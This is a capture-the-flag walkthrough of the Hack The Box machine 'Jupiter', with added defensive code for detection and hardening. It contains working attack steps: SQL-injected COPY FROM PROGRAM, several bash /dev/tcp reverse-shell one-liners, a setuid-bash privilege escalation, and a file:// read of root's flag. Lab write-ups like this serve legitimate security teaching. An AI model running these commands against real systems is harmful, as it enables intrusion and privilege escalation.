Jupiter – HTB Walkthrough

Introduction

In this walkthrough, I will go through the medium HTB box Jupiter 🙂

Recon

NMAP

As usual, there are two ports open: 22 and 80.

Let's visit the site 🙂

Let's add jupiter.htb to our /etc/hosts file.

Enumeration

I used ffuf and found one subdomain, kiosk; add this to /etc/hosts as well.

Use Burp to visit kiosk.jupiter.htb and then check the HTTP history 🙂

Now send this request to Repeater 🙂


Change the rawSql param value to:

"CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'bash -c \"bash -i >& /dev/tcp/10.10.X.X/4444 0>&1\"'"

Now your modified request will look like this 🙂

Note: Don't forget to start the nc listener 🙂

And GG, you will get the revshell 🙂
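From the defender's side, the request above is only possible because the database role used by the web application is allowed to run COPY ... FROM PROGRAM, and it leaves a very clear trace in the PostgreSQL statement log. The following is an added example (not part of the original writeup) of a small log-scanning check that flags such statements. The log lines are constructed here to mimic log_statement = 'all' output with a '%m [%p] %u@%d ' line prefix; the role and database names are assumptions, not values from the box.

```python
import re

# Constructed sample of PostgreSQL log lines (not captured from the box).
# Format assumed: log_line_prefix = '%m [%p] %u@%d ' with log_statement = 'all'.
SAMPLE_PG_LOG = """\
2023-06-01 10:00:01.123 UTC [4101] app_user@appdb LOG:  statement: SELECT name FROM moons ORDER BY name
2023-06-01 10:00:07.456 UTC [4102] app_user@appdb LOG:  statement: CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id'
2023-06-01 10:00:09.789 UTC [4102] app_user@appdb LOG:  statement: SELECT * FROM cmd_exec
2023-06-01 10:00:12.000 UTC [4103] app_user@appdb LOG:  statement: COPY moons TO '/tmp/moons.csv'
"""

# Pulls pid, role@db and the SQL text out of one log line.
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) LOG:\s+statement: (?P<sql>.*)$"
)

# Ordered detection rules: first match wins. COPY ... FROM/TO PROGRAM spawns a
# shell on the database server; COPY to/from a quoted path touches server files.
RULES = [
    ("copy_program", "high", re.compile(r"\bCOPY\b.+?\b(FROM|TO)\s+PROGRAM\b", re.I | re.S)),
    ("server_file_copy", "medium", re.compile(r"\bCOPY\b.+?\b(FROM|TO)\s+'", re.I | re.S)),
]


def flag_dangerous_statements(lines):
    """Return a list of findings for log lines whose SQL matches a rule."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not a statement line (or a different prefix format)
        sql = m.group("sql")
        for rule, severity, pattern in RULES:
            if pattern.search(sql):
                findings.append({
                    "line": lineno,
                    "pid": m.group("pid"),
                    "user": m.group("user"),
                    "rule": rule,
                    "severity": severity,
                    "sql": sql,
                })
                break
    return findings


if __name__ == "__main__":
    for f in flag_dangerous_statements(SAMPLE_PG_LOG.splitlines()):
        print(f"[{f['severity']}] line {f['line']} pid {f['pid']} ({f['user']}): {f['rule']}: {f['sql']}")
```

The corresponding hardening is on the database side: the application's role must not be a superuser or a member of pg_execute_server_program (or pg_read_server_files / pg_write_server_files), and the application itself should not forward a caller-supplied rawSql value to the database at all.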

Foothold

Now we have a shell as the postgres user.

In /dev/shm we can see juno's .yml file, and we have permission to write to it 🙂

Let's upgrade the shell and edit network-simulation.yml:

general:
  # stop after 10 simulated seconds
  stop_time: 10s
  # old versions of cURL use a busy loop, so to avoid spinning in this busy
  # loop indefinitely, we add a system call latency to advance the simulated
  # time when running non-blocking system calls
  model_unblocked_syscall_latency: true

network:
  graph:
    # use a built-in network graph containing
    # a single vertex with a bandwidth of 1 Gbit
    type: 1_gbit_switch

hosts:
  # a host with the hostname 'server'
  server:
    network_node_id: 0
    processes:
    - path: /usr/bin/cp
      args: /bin/bash /tmp/bash
      start_time: 3s
  # three hosts with hostnames 'client1', 'client2', and 'client3'
  client:
    network_node_id: 0
    quantity: 3
    processes:
    - path: /usr/bin/chmod
      args: u+s /tmp/bash
      start_time: 5s

After this, execute /tmp/bash -p to get a shell as juno.
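The weakness exploited above is a file in /dev/shm that another user's scheduled job consumes but that is writable by everyone, and the result is a copy of bash with the setuid bit in /tmp. Both conditions are cheap to audit. The following is an added example (not code from the writeup) of a small audit script: pure classification functions that can be unit-tested on constructed modes, plus a walker over the directories where such artifacts typically land. The list of "expected" setuid directories is an assumption for a typical Linux layout.

```python
import os
import stat

# Directories where packaged setuid/setgid binaries normally live (assumption
# for a typical Linux host; adjust to the distribution in use).
EXPECTED_SUID_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")

# Places where an attacker-created setuid copy or a world-writable config
# usually appears.
DEFAULT_ROOTS = ("/tmp", "/var/tmp", "/dev/shm", "/home")


def classify_suid(path, mode):
    """Return a finding for a setuid/setgid regular file outside the expected dirs, else None."""
    if not stat.S_ISREG(mode):
        return None
    bits = []
    if mode & stat.S_ISUID:
        bits.append("setuid")
    if mode & stat.S_ISGID:
        bits.append("setgid")
    if not bits or path.startswith(EXPECTED_SUID_DIRS):
        return None
    return f"{path}: {'+'.join(bits)} file outside packaged binary directories"


def classify_other_writable(path, mode):
    """Return a finding for a world-writable regular file, else None."""
    if stat.S_ISREG(mode) and mode & stat.S_IWOTH:
        return f"{path}: world-writable file (anyone can change what its consumer will run)"
    return None


def audit_paths(roots=DEFAULT_ROOTS):
    """Walk the given roots and collect findings from both classifiers."""
    findings = []
    for root in roots:
        for dirpath, _dirnames, filenames in os.walk(root):
            for name in filenames:
                full = os.path.join(dirpath, name)
                try:
                    st = os.lstat(full)  # lstat: do not follow symlinks
                except OSError:
                    continue
                for classify in (classify_suid, classify_other_writable):
                    finding = classify(full, st.st_mode)
                    if finding:
                        findings.append(finding)
    return findings


if __name__ == "__main__":
    for line in audit_paths():
        print(line)
```

On the box itself the fix would be to let the job consume a configuration file the unprivileged user cannot write (owned by juno, mode 0644, outside /dev/shm) and to mount /dev/shm and /tmp with nosuid so a copied bash cannot gain privileges even if the setuid bit is set.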

But we cannot read user.txt because of the uid ………………. However, there is a shadow-simulation.sh file in the home directory. Let's add the revshell to that script.

Our updated shadow-simulation.sh will look like this:

#!/bin/bash
cd /dev/shm
rm -rf /dev/shm/shadow.data
/home/juno/.local/bin/shadow /dev/shm/*.yml
cp -a /home/juno/shadow/examples/http-server/network-simulation.yml /dev/shm/
bash -i >& /dev/tcp/10.<ip>/4444 0>&1

After getting the shell as juno, we can read user.txt.

User – Jovian

If you check the output of the id command, you will see that juno belongs to the science group, which gives access to /opt/solar-flares/.

Run grep -rie token in /opt/solar-flares/logs/ to find the right Jupyter token in the logs, based on the date.

Let's use chisel to port forward 8888 and use this token.

Now let's use the token of the current date 🙂

After logging in, we can execute commands in the flares.ipynb notebook:

//RUN

import os; os.system('bash -c "bash -i >& /dev/tcp/10.10.<ip>/4444 0>&1"');

After executing it, we will get the shell as Jovian.
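The pivot to Jovian works because Jupyter prints its access token into a log that a lower-privileged group can read, and because the token from the most recent start is still valid. The following is an added example (not part of the writeup) of a check that scans such logs for leaked tokens, reports them masked so the scan output does not become a second leak, and picks out the most recent one, which is the one a defender should assume is live. The log lines are constructed to resemble Jupyter's startup banner; the token values are random-looking placeholders, not values from the box.

```python
import re
from datetime import datetime

# Constructed sample log lines in the style of Jupyter's startup output.
# Tokens below are made-up 48-hex placeholders, not real secrets.
SAMPLE_JUPYTER_LOG = """\
[I 2023-06-01 09:00:00.000 ServerApp] Jupyter Server is running at:
[I 2023-06-01 09:00:00.001 ServerApp] http://localhost:8888/lab?token=0123456789abcdef0123456789abcdef0123456789abcdef
[W 2023-06-02 11:15:42.137 ServerApp] 403 GET /api/sessions (127.0.0.1): Forbidden
[I 2023-06-03 08:30:10.500 ServerApp] http://localhost:8888/lab?token=fedcba9876543210fedcba9876543210fedcba9876543210
[I 2023-06-03 08:30:10.501 ServerApp]  or http://127.0.0.1:8888/lab?token=fedcba9876543210fedcba9876543210fedcba9876543210
"""

# Jupyter tokens are 48 hex characters (24 random bytes, hex-encoded).
TOKEN_RE = re.compile(r"[?&]token=([0-9a-f]{48})\b")
# Timestamp inside the "[I 2023-06-01 09:00:00.000 ServerApp]" prefix.
STAMP_RE = re.compile(r"^\[[A-Z] (\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})")


def mask(token):
    """Show only the ends of a secret so a report can identify it without disclosing it."""
    return token[:4] + "..." + token[-4:]


def find_token_leaks(lines):
    """Return one finding per distinct token: (first_seen datetime, masked token, line numbers)."""
    seen = {}
    for lineno, line in enumerate(lines, start=1):
        m = TOKEN_RE.search(line)
        if not m:
            continue
        stamp = STAMP_RE.match(line)
        when = datetime.strptime(stamp.group(1), "%Y-%m-%d %H:%M:%S") if stamp else None
        token = m.group(1)
        entry = seen.setdefault(token, {"first_seen": when, "lines": []})
        entry["lines"].append(lineno)
        if when and (entry["first_seen"] is None or when < entry["first_seen"]):
            entry["first_seen"] = when
    return [(v["first_seen"], mask(t), v["lines"]) for t, v in seen.items()]


def most_recent_leak(findings):
    """The newest token is the one most likely still accepted by a running server."""
    dated = [f for f in findings if f[0] is not None]
    return max(dated, key=lambda f: f[0]) if dated else None


if __name__ == "__main__":
    findings = find_token_leaks(SAMPLE_JUPYTER_LOG.splitlines())
    for when, masked, lines in findings:
        print(f"{when} token {masked} on lines {lines}")
    print("most recent:", most_recent_leak(findings))
```

The mitigation is to keep Jupyter's log readable only by the account that runs it (and not by a shared group such as science), or to stop the token from reaching the log at all by configuring a password instead of token authentication.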

Root

Use sudo -l to check whether there is some binary we can run as the root user.

Jovian can run /usr/local/bin/sattrack as root. We can get some information about this executable by using the strings tool and then grepping the output to see whether it reads a config file:

strings /usr/local/bin/sattrack | grep -i config

Look for it in the filesystem and copy it to the /tmp folder:

find / -name config.json 2>/dev/null
cp /usr/local/share/sattrack/config.json /tmp

Now, by running the sattrack executable as root, we can see that it downloads into the working directory any file specified in a particular section of config.json. Let's try to exploit this feature by requesting the root.txt we want to read.

nano config.json

Find the tlesources section and replace any of the 3 URLs with file:///root/root.txt, as shown below:

"tlesources":[
    "file:///root/root.txt",
    "http://celestrak.org/NORAD/elements/n...",
    "http://celestrak.org/NORAD/elements/g..."
],

Save the new config.json and simply run sattrack as root. Enjoy the flag!

sudo /usr/local/bin/sattrack
cat /tmp/tle/root.txt
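Two separate defects combine in the root step: the downloader accepts any URL scheme its HTTP library supports (so file:// turns a fetch into a local file read as root), and the program, run via sudo, takes its configuration from a location the unprivileged user controls. The following is an added example (not the sattrack code, whose source is not on the page) of how a config-driven fetcher should validate its tlesources list and check that its config file is trustworthy before acting on it. The sample config is constructed; the hostnames in it are placeholders, not the real sources from the box.

```python
import json
import stat
from urllib.parse import urlparse

# Only remote web fetches are legitimate for a TLE source list; file://, ftp://
# and bare paths are rejected before any download happens.
ALLOWED_SCHEMES = {"http", "https"}

# Constructed sample config in the shape of sattrack's tlesources section.
# Hostnames are placeholders, not the real sources.
SAMPLE_CONFIG = json.loads("""{
  "tlesources": [
    "file:///root/root.txt",
    "http://tle.example.com/active.txt",
    "ftp://tle.example.com/old.txt",
    "/etc/shadow",
    "https://tle.example.com/weather.txt"
  ]
}""")


def validate_tlesources(config):
    """Split the tlesources list into (accepted, rejected) where rejected carries a reason."""
    accepted, rejected = [], []
    for entry in config.get("tlesources", []):
        if not isinstance(entry, str):
            rejected.append((repr(entry), "not a string"))
            continue
        parts = urlparse(entry)
        scheme = parts.scheme.lower()
        if scheme not in ALLOWED_SCHEMES:
            rejected.append((entry, f"scheme '{scheme or '(none)'}' not allowed"))
        elif not parts.netloc:
            rejected.append((entry, "missing host"))
        else:
            accepted.append(entry)
    return accepted, rejected


def config_is_trusted(owner_uid, mode):
    """A config consumed by a root process must be root-owned and not group/world-writable."""
    if not stat.S_ISREG(mode):
        return False
    if owner_uid != 0:
        return False
    return not (mode & (stat.S_IWGRP | stat.S_IWOTH))


if __name__ == "__main__":
    ok, bad = validate_tlesources(SAMPLE_CONFIG)
    print("accepted:", ok)
    for url, reason in bad:
        print("rejected:", url, "->", reason)
    # Example: a /tmp copy owned by uid 1000 with mode 0644 must not be trusted.
    print("trusted:", config_is_trusted(1000, 0o100644))
```

The second check matters as much as the first: even with a strict scheme allowlist, a sudo rule that lets a user run a binary which reads its config from the current directory, or from any path the user can write, gives that user control over what root does. The config should live in a root-owned directory and the binary should refuse to start if the file fails config_is_trusted.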

Conclusion

This box is pretty interesting and stressful at the same time; if you have a personal instance then no problem 🙂 I would rate this box 5/10.

Have a nice day!

Jay Shri Krishna ❤️❤️